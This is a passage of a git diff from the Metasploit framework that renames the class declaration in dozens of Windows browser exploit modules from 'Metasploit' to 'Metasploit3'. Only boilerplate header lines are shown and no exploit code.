-class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index 23c88a0e4a..62d06f8211 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 6c5aaa67d7..3a39839a25 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index 8039482163..b5f802fa7f 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb index 06a327adf5..78466bd120 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 68fc8021fa..814fc873d2 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index a782dfda65..663b4945a0 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index 17b158c269..e9a1aced93 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 5d3e22d9ac..3efacb9c49 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index a60da6e564..37adc9b873 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index a84c94cc7f..a92886b94d 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb index 5ccccc458f..fe8ede5cbd 100644 --- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb +++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 19e7df0843..1b5560873d 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 4f2db95a56..4ab495e851 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index c43291a111..921285149b 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 634c748826..3d3cdf9c3c 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index 499754ca0a..a45a935ef6 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index cd8105d550..7290b5d166 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 54dbd09741..66f3e99668 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb index ea2d593c75..28762797c1 100644 --- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb +++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 9e20771b04..1850394ce0 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index c34b7d135a..a3394b541b 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -21,7 +21,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index 189506de31..ec3f7c8ed2 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 00dc23faef..13fa3b651c 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index 46d6a717f3..550395255f 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 530466518d..55850db2a5 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 9ef9b17ed5..9276a059e5 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index 9e23331e21..bc4efcd457 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index 0d85a1f36f..5b907dc8a2 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index 2688b05846..e3d390f8eb 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index 83696623fd..5c62ea02a1 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index c4b9f764ae..dd64b699b0 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index 030008284a..a56df9c525 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # heap spray :-/ include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index d6e7dec432..a8488b29d4 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index c40ef85a1f..772a924e42 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index cff994a7cb..f16b3b4c58 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index 247356f8b0..c966b6145b 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index a1e4d459e4..96a4f7cfc7 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index aab4caf840..96741d004e 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 9b1320e9c9..4b49aa83b6 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 588575a5b9..6db53caf87 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 99611317c1..09d208386c 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Seh diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb index 950d7e89b7..1be71a45b7 100644 --- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb +++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index aa8b0e2b61..caab7e277b 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/util/exe' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index 866abadb02..fa0e081109 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 8fb77d35d2..8abc7a8ae0 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index acc645077d..d9bc4a1265 100644 --- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index 5f6ee0218e..9456b7d5b6 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index f36b17bc1b..3e75330b62 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb index 6f7340c33b..7ca72c586c 100644 --- a/modules/exploits/windows/browser/java_cmm.rb +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 998b591efd..cc88830088 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index 211d649840..52425ef4c4 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index d133611e8f..d6c31e3ecb 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index 4c4e075fdc..bed81f6b2e 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index 60393f76a6..f57b207b6d 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 556ed19fd4..e832ba3f89 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index 6931d0390e..c72124cf60 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index dcbf6934b0..c6cce237eb 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb index bb43d095ea..4502c63b37 100644 --- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb +++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 67eb160589..4397a6b09a 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index e7d8b90841..4f9d33b47f 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index 